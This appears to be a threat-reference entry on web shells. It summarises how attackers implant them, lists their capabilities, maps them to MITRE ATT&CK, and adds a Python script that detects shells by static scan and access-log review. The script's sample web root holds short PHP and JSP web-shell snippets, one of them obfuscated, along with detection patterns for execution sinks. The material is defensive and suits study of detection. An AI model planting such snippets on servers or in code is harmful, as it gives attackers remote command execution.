Summary
A web shell is a malicious script, usually written in a server-side web language such as ASP, PHP or JSP, that an attacker plants on a web server to gain remote access to it and execute code with the privileges of the web server process.
To implant a web shell, attackers exploit security gaps in Internet-facing web servers, typically vulnerabilities in the web applications they host, for example CVE-2019-0604 (Microsoft SharePoint) or CVE-2019-16759 (vBulletin). Attackers usually locate such vulnerabilities with network reconnaissance and vulnerability-scanning tools before attempting the upload. Once the shell is in place, the attacker uses it to issue commands remotely and as a foothold for further exploitation, including privilege escalation. Typical commands add, delete and execute files, and run shell commands, executables or scripts.
Once installed, a web shell gives the attacker the following capabilities:
- Execute commands on, and steal data from, the web server
- Use the server as a launch pad for further attacks against the affected organization
- Issue commands to hosts inside the network that have no direct Internet access
- Upload additional malware, such as Chopper, for watering hole attacks and for scanning other victims
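As an added example that is not part of the original entry, the following Python script pairs the two checks a responder would run against the behaviour described above: a static scan of the web root for code patterns typical of PHP, ASP and JSP web shells (request input flowing into an execution sink, obfuscated payloads), and an access-log review that flags POST requests to the scripts the scan caught, or to script paths that only ever receive POSTs without a Referer. Every file, path, pattern and log line is constructed sample data for the example, not an indicator from any real incident.

```python
"""Added example, not code from the original page: web-shell triage combining a
static scan of the web root with an access-log review. All file contents,
paths and log lines below are constructed sample data."""
import re
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List, Set

# Constructed sample web root: relative path -> file contents.
SAMPLE_WEBROOT: Dict[str, str] = {
    # Ordinary application code; must not be flagged.
    "index.php": "<?php\nrequire 'lib.php';\necho render_page($_GET['page'] ?? 'home');\n",
    "lib.php": "<?php\nfunction render_page($p) { return htmlspecialchars($p); }\n",
    # One-line PHP shell: the POST body is handed straight to eval().
    "images/cache.php": "<?php @eval($_POST['pass']); ?>",
    # Obfuscated variant: 'c3lzdGVt' is base64 for 'system'.
    "uploads/logo.php": "<?php $x=base64_decode('c3lzdGVt'); $x($_REQUEST['c']); ?>",
    # JSP variant: request parameter passed to Runtime.exec().
    "static/help.jsp": '<% Runtime.getRuntime().exec(request.getParameter("cmd")); %>',
}

# (regex, explanation) pairs for the static scan; illustrative, not exhaustive.
SHELL_PATTERNS = [
    (r"\b(eval|assert|system|exec|shell_exec|passthru|popen|proc_open)\s*\(\s*\$_(POST|GET|REQUEST|COOKIE)",
     "request parameter passed to a PHP execution sink"),
    (r"\$\w+\s*\(\s*\$_(POST|GET|REQUEST|COOKIE)",
     "request parameter passed to a variable function call"),
    (r"\b(base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(",
     "payload decoding typical of obfuscated shells"),
    (r"Runtime\.getRuntime\(\)\.exec\s*\(.*request\.getParameter",
     "JSP request parameter passed to Runtime.exec()"),
    (r"\b(Eval|Execute)\s*\(\s*Request\b",
     "ASP request input passed to Eval/Execute"),
]

@dataclass
class Finding:
    path: str
    reason: str

def scan_webroot(files: Dict[str, str]) -> List[Finding]:
    """Return one Finding per (file, matching pattern)."""
    findings = []
    for path, content in files.items():
        for pattern, reason in SHELL_PATTERNS:
            if re.search(pattern, content):
                findings.append(Finding(path, reason))
    return findings

# Constructed access log in Apache combined format.
SAMPLE_ACCESS_LOG = """\
203.0.113.7 - - [10/Mar/2020:10:01:02 +0000] "GET /index.php?page=home HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Mar/2020:10:01:03 +0000] "GET /static/app.css HTTP/1.1" 200 812 "-" "Mozilla/5.0"
198.51.100.23 - - [10/Mar/2020:10:05:44 +0000] "POST /images/cache.php HTTP/1.1" 200 311 "-" "python-requests/2.22.0"
198.51.100.23 - - [10/Mar/2020:10:05:51 +0000] "POST /images/cache.php HTTP/1.1" 200 4097 "-" "python-requests/2.22.0"
203.0.113.9 - - [10/Mar/2020:10:07:12 +0000] "POST /login.php HTTP/1.1" 302 0 "http://example.test/login.php" "Mozilla/5.0"
198.51.100.23 - - [10/Mar/2020:10:09:30 +0000] "POST /uploads/logo.php HTTP/1.1" 200 2048 "-" "python-requests/2.22.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

def review_access_log(log_text: str, flagged_paths: Set[str]) -> List[str]:
    """Flag POSTs to scripts the static scan caught, plus POST-only script paths
    hit without a Referer (a shell is driven by a tool, not reached from a page)."""
    entries = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m:
            e = m.groupdict()
            e["path"] = e["target"].split("?", 1)[0]   # drop the query string
            entries.append(e)
    methods_by_path = defaultdict(set)
    for e in entries:
        methods_by_path[e["path"]].add(e["method"])
    suspicious = []
    for e in entries:
        if e["method"] != "POST":
            continue
        if e["path"].lstrip("/") in flagged_paths:
            suspicious.append(f"{e['ip']} POST {e['path']}: file flagged by static scan")
        elif methods_by_path[e["path"]] == {"POST"} and e["referer"] == "-":
            suspicious.append(f"{e['ip']} POST {e['path']}: POST-only path with no Referer")
    return suspicious

if __name__ == "__main__":
    findings = scan_webroot(SAMPLE_WEBROOT)
    for f in findings:
        print(f"[static] {f.path}: {f.reason}")
    for hit in review_access_log(SAMPLE_ACCESS_LOG, {f.path for f in findings}):
        print(f"[log]    {hit}")
```

On the sample data the scan flags the three planted scripts and leaves the application code alone, and the log review reports three POSTs to them while ignoring the legitimate form submission to login.php, which carries a Referer. The second heuristic is deliberately independent of the first so that a shell whose source was never recovered (for example, one already deleted by the attacker) can still surface from traffic alone.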
Capabilities
- Information Theft
- Backdoor commands
- Exploits
Impact
- Compromise system security - with backdoor capabilities that can execute malicious commands
- Violation of user privacy - gathers user credentials and steals user information
Additional Threat Reference Information
Infection Chain
MITRE ATT&CK Matrix
BEHAVIOR | TACTIC | TECHNIQUE
---|---|---
Attackers take advantage of security gaps in Internet-facing web servers | Initial Access | T1190: Exploit Public-Facing Application
Allow attackers to execute commands from a web server | Execution | T1035: Service Execution
Attackers install a web shell on a vulnerable or misconfigured Internet-facing web server | Persistence, Privilege Escalation | T1100: Web Shell
Compromised accounts are accessed | Credential Access | T1110: Brute Force
Attacker identifies exploitable vulnerabilities and targets using network reconnaissance tools | Discovery | T1087: Account Discovery; T1135: Network Share Discovery; T1201: Password Policy Discovery; T1069: Permission Groups Discovery
Web shell commands add, delete and execute files and run shell commands, executables or scripts on other hosts | Lateral Movement | T1077: Windows Admin Shares
Harvests sensitive data and credentials | Collection | T1119: Automated Collection
Gathered information is sent to the attacker's C&C server | Exfiltration | T1041: Exfiltration Over Command and Control Channel

Technique IDs follow the ATT&CK numbering in use when this entry was written. T1035, T1100 and T1077 have since been folded into sub-techniques T1569.002 (System Services: Service Execution), T1505.003 (Server Software Component: Web Shell) and T1021.002 (Remote Services: SMB/Windows Admin Shares) respectively.